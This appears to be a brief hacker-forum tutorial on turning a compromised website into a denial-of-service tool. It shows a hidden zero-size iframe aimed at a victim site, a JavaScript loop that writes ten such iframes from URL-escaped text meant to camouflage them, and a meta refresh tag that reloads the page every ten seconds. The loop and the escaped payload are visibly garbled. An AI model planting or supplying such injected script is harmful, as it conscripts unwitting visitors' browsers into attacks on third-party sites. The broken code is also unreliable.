DDOS srcipt for webpages.

What I mean ?
I mean that some hackers when they get into a server they do not deface the website but they use it for DDOS attacks.

Here are some srcripts that I have made or found.

Some hackers just post this script in the webpage.

<IFRAME SRC="www.victim.com" WIDTH=0 HEIGHT=0

This srcipt is so simple that a normal html programmer will see it and probably delete it.

So they put the following in the site which is far more less attractive.

<script language="javascript">
for(i=1; i<=10; i++)
        document.write( unescape(
0A%09%09%09')) ;


The i<=10 just create 10 iframes for better DDOS attack.
The '%3C%49%46%52%41%4D%45%20%53%52%43%3D%22%68%74%74%70%
0A%09%09%09')) ; is escaped characters in order to camouflage the code ;P

In the end they plant at the HEADER of the site the following command:

<meta http-equiv="refresh" content="10">

With this way , the webpage makes the browser  refreshes every 10 seconds.

Thanks for reading ! ;)
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